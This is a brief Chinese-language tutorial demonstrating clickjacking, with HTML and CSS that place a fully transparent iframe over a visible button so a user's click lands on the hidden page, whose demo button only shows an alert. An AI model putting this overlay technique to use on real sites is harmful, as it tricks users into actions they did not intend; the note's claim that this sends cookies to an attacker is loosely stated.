关于iframe劫持页面

<iframe id="hidden" src="inner.html" scrolling="no"></iframe>

这个制作一个有问题的iframe

添加到clickjacking.html中

<style>
#click{
    width:100px;
    top:20px;
    left:20px;
    position:absolute;
z-index:1
}
#hidden{
    height:50px;
    width:120px;
    position:absolute;
    filter:alpha(opacity=0);
    opacity:0.0;
z-index:2
}
</style>
<input id="click" value="Clickme" type="button" />
<iframe id="hidden" src="inner.html" scrolling="no"></iframe>

添加一个内置的html---inner.html

<input style="width:100px;"value="L" type="button" onclick="alert('test')"/>

关键的是opacity:0.0,这里设置了iframe透明度为0，所以虽然他在表面，但是用户看到的是底层的图层，引诱用户点击，从而把浏览器中的cookie之类的重要信息发送给攻击者